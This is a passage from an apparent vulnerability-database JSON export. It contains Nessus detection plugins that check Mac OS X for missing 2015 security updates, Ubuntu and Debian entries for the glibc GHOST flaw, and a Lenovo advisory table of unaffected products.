"CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000", "CVE-2015-7036"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_10_4.NASL", "href": "https://www.tenable.com/plugins/nessus/84488", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84488);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2015-0209\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-0286\",\n \"CVE-2015-0287\",\n \"CVE-2015-0288\",\n \"CVE-2015-0289\",\n \"CVE-2015-0293\",\n \"CVE-2015-1157\",\n \"CVE-2015-1798\",\n \"CVE-2015-1799\",\n \"CVE-2015-3661\",\n \"CVE-2015-3662\",\n \"CVE-2015-3663\",\n \"CVE-2015-3666\",\n \"CVE-2015-3667\",\n \"CVE-2015-3668\",\n \"CVE-2015-3671\",\n \"CVE-2015-3672\",\n \"CVE-2015-3673\",\n \"CVE-2015-3674\",\n \"CVE-2015-3675\",\n \"CVE-2015-3676\",\n \"CVE-2015-3677\",\n \"CVE-2015-3678\",\n \"CVE-2015-3679\",\n \"CVE-2015-3680\",\n \"CVE-2015-3681\",\n \"CVE-2015-3682\",\n \"CVE-2015-3683\",\n \"CVE-2015-3684\",\n \"CVE-2015-3685\",\n \"CVE-2015-3686\",\n \"CVE-2015-3687\",\n \"CVE-2015-3688\",\n \"CVE-2015-3689\",\n \"CVE-2015-3690\",\n \"CVE-2015-3691\",\n \"CVE-2015-3692\",\n \"CVE-2015-3693\",\n \"CVE-2015-3694\",\n \"CVE-2015-3695\",\n \"CVE-2015-3696\",\n \"CVE-2015-3697\",\n \"CVE-2015-3698\",\n \"CVE-2015-3699\",\n \"CVE-2015-3700\",\n \"CVE-2015-3701\",\n \"CVE-2015-3702\",\n \"CVE-2015-3703\",\n \"CVE-2015-3704\",\n \"CVE-2015-3705\",\n \"CVE-2015-3706\",\n \"CVE-2015-3707\",\n \"CVE-2015-3708\",\n \"CVE-2015-3709\",\n \"CVE-2015-3710\",\n \"CVE-2015-3711\",\n \"CVE-2015-3712\",\n \"CVE-2015-3713\",\n \"CVE-2015-3714\",\n \"CVE-2015-3715\",\n \"CVE-2015-3716\",\n \"CVE-2015-3717\",\n \"CVE-2015-3718\",\n \"CVE-2015-3719\",\n \"CVE-2015-3720\",\n \"CVE-2015-3721\",\n \"CVE-2015-4000\",\n \"CVE-2015-7036\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73225,\n 73227,\n 73231,\n 73232,\n 73237,\n 73239,\n 73950,\n 73951,\n 74733\n );\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-06-30-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Mac OS X 10.10.x < 10.10.4 Multiple Vulnerabilities (GHOST) (Logjam)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.x that is prior\nto 10.10.4. It is, therefore, affected multiple vulnerabilities in the\nfollowing components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ca/HT204942\");\n # http://lists.apple.com/archives/security-announce/2015/Jun/msg00002.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?956357d4\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.10.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple OS X Entitlements Rootpipe Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\nif (!ereg(pattern:\"^10\\.10([^0-9]|$)\", string:version)) audit(AUDIT_OS_NOT, \"Mac OS X 10.10\", \"Mac OS X \"+version);\n\nfixed_version = \"10.10.4\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:26", "description": "The remote host is running a version of Mac OS X 10.8.5 or 10.9.5 that is missing Security Update 2015-005. It is, therefore, affected multiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-07-01T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2015-005) (GHOST) (Logjam)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", "CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", "CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2015-005.NASL", "href": "https://www.tenable.com/plugins/nessus/84489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84489);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2015-0209\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-0286\",\n \"CVE-2015-0287\",\n \"CVE-2015-0288\",\n \"CVE-2015-0289\",\n \"CVE-2015-0293\",\n \"CVE-2015-1157\",\n \"CVE-2015-1798\",\n \"CVE-2015-1799\",\n \"CVE-2015-3661\",\n \"CVE-2015-3662\",\n \"CVE-2015-3663\",\n \"CVE-2015-3666\",\n \"CVE-2015-3667\",\n \"CVE-2015-3668\",\n \"CVE-2015-3671\",\n \"CVE-2015-3672\",\n \"CVE-2015-3673\",\n \"CVE-2015-3674\",\n \"CVE-2015-3675\",\n \"CVE-2015-3676\",\n \"CVE-2015-3677\",\n \"CVE-2015-3678\",\n \"CVE-2015-3679\",\n \"CVE-2015-3680\",\n \"CVE-2015-3681\",\n \"CVE-2015-3682\",\n \"CVE-2015-3683\",\n \"CVE-2015-3684\",\n \"CVE-2015-3685\",\n \"CVE-2015-3686\",\n \"CVE-2015-3687\",\n \"CVE-2015-3688\",\n \"CVE-2015-3689\",\n \"CVE-2015-3690\",\n \"CVE-2015-3691\",\n \"CVE-2015-3692\",\n \"CVE-2015-3693\",\n \"CVE-2015-3694\",\n \"CVE-2015-3695\",\n \"CVE-2015-3696\",\n \"CVE-2015-3697\",\n \"CVE-2015-3698\",\n \"CVE-2015-3699\",\n \"CVE-2015-3700\",\n \"CVE-2015-3701\",\n \"CVE-2015-3702\",\n \"CVE-2015-3703\",\n \"CVE-2015-3704\",\n \"CVE-2015-3705\",\n \"CVE-2015-3706\",\n \"CVE-2015-3707\",\n \"CVE-2015-3708\",\n \"CVE-2015-3709\",\n \"CVE-2015-3710\",\n \"CVE-2015-3711\",\n \"CVE-2015-3712\",\n \"CVE-2015-3713\",\n \"CVE-2015-3714\",\n \"CVE-2015-3715\",\n \"CVE-2015-3716\",\n \"CVE-2015-3717\",\n \"CVE-2015-3718\",\n \"CVE-2015-3719\",\n \"CVE-2015-3720\",\n \"CVE-2015-3721\",\n \"CVE-2015-4000\"\n );\n script_bugtraq_id(\n 72325,\n 72701,\n 73225,\n 73227,\n 73231,\n 73232,\n 73237,\n 73239,\n 73950,\n 73951,\n 74733\n );\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-06-30-2\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2015-005) (GHOST) (Logjam)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8.5 or 10.9.5\nthat is missing Security Update 2015-005. It is, therefore, affected\nmultiple vulnerabilities in the following components :\n\n - Admin Framework\n - afpserver\n - apache\n - AppleFSCompression\n - AppleGraphicsControl\n - AppleThunderboltEDMService\n - ATS\n - Bluetooth\n - Certificate Trust Policy\n - CFNetwork HTTPAuthentication\n - CoreText\n - coreTLS\n - DiskImages\n - Display Drivers\n - EFI\n - FontParser\n - Graphics Driver\n - ImageIO\n - Install Framework Legacy\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOFireWireFamily\n - Kernel\n - kext tools\n - Mail\n - ntfs\n - ntp\n - OpenSSL\n - QuickTime\n - Security\n - Spotlight\n - SQLite\n - System Stats\n - TrueTypeScaler\n - zip\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ca/HT204942\");\n # http://lists.apple.com/archives/security-announce/2015/Jun/msg00002.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?956357d4\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://weakdh.org/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2015-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple OS X Entitlements Rootpipe Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\npatch = \"2015-005\";\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that the update is available for 10.10.2\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[89]\\.5([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.8.5 or Mac OS X 10.9.5\");\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.security\\..*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T14:44:48", "description": "The remote host is running a version of Mac OS X 10.10.x that is prior to version 10.10.4 and the following components contain vulnerabilities :\n\n - Admin Framework \n- afpserver \n - apache \n - AppleFSCompression \n - AppleGraphicsControl \n - AppleThunderboltEDMService \n - ATS \n - Bluetooth \n - Certificate Trust Policy \n - CFNetwork HTTPAuthentication \n - CoreText \n - coreTLS \n - DiskImages \n - Display Drivers \n - EFI \n - FontParser \n - Graphics Driver \n - ImageIO \n - Install Framework Legacy \n - Intel Graphics Driver \n - IOAcceleratorFamily \n - IOFireWireFamily \n - Kernel \n - kext tools \n - Mail \n - ntfs \n - ntp \n - OpenSSL \n - QuickTime \n - Security \n - Spotlight \n - SQLite \n - System Stats \n - TrueTypeScaler \n - zip", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-10-12T00:00:00", "type": "nessus", "title": "Mac OS X < 10.10.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1741", "CVE-2014-8127", "CVE-2014-8128", "CVE-2014-8129", "CVE-2014-8130", "CVE-2014-8139", "CVE-2014-8140", "CVE-2014-8141", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0273", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0293", "CVE-2015-1157", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-3661", "CVE-2015-3662", "CVE-2015-3663", "CVE-2015-3666", "CVE-2015-3667", "CVE-2015-3668", "CVE-2015-3671", "CVE-2015-3672", "CVE-2015-3673", "CVE-2015-3674", "CVE-2015-3675", "CVE-2015-3676", "CVE-2015-3677", "CVE-2015-3678", "CVE-2015-3679", "CVE-2015-3680", "CVE-2015-3681", "CVE-2015-3682", "CVE-2015-3683", "CVE-2015-3684", "CVE-2015-3685", "CVE-2015-3686", "CVE-2015-3687", "CVE-2015-3688", "CVE-2015-3689", "CVE-2015-3690", "CVE-2015-3691", "CVE-2015-3692", "CVE-2015-3693", "CVE-2015-3694", "CVE-2015-3695", "CVE-2015-3696", "CVE-2015-3697", "CVE-2015-3698", "CVE-2015-3699", "CVE-2015-3700", "CVE-2015-3701", "CVE-2015-3702", "CVE-2015-3703", "CVE-2015-3704", "CVE-2015-3705", "CVE-2015-3706", "CVE-2015-3707", "CVE-2015-3708", "CVE-2015-3709", "CVE-2015-3710", "CVE-2015-3711", "CVE-2015-3712", "CVE-2015-3713", "CVE-2015-3714", "CVE-2015-3715", "CVE-2015-3716", "CVE-2015-3717", "CVE-2015-3718", "CVE-2015-3719", "CVE-2015-3720", "CVE-2015-3721", "CVE-2015-4000"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "8801.PRM", "href": "https://www.tenable.com/plugins/nnm/8801", "sourceData": "Binary data 8801.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:17:51", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in\nglibc 2.2, and other 2.x versions before 2.18, allows context-dependent\nattackers to execute arbitrary code via vectors related to the (1)\ngethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"\n\n#### Bugs\n\n * <https://sourceware.org/bugzilla/show_bug.cgi?id=15014>\n", "cvss3": {}, "published": "2015-01-27T00:00:00", "type": "ubuntucve", "title": "CVE-2015-0235", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-27T00:00:00", "id": "UB:CVE-2015-0235", "href": "https://ubuntu.com/security/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-01-15T06:06:28", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"", "cvss3": {}, "published": "2015-01-28T19:59:00", "type": "debiancve", "title": "CVE-2015-0235", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-28T19:59:00", "id": "DEBIANCVE:CVE-2015-0235", "href": "https://security-tracker.debian.org/tracker/CVE-2015-0235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2022-10-24T16:54:22", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e (AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation 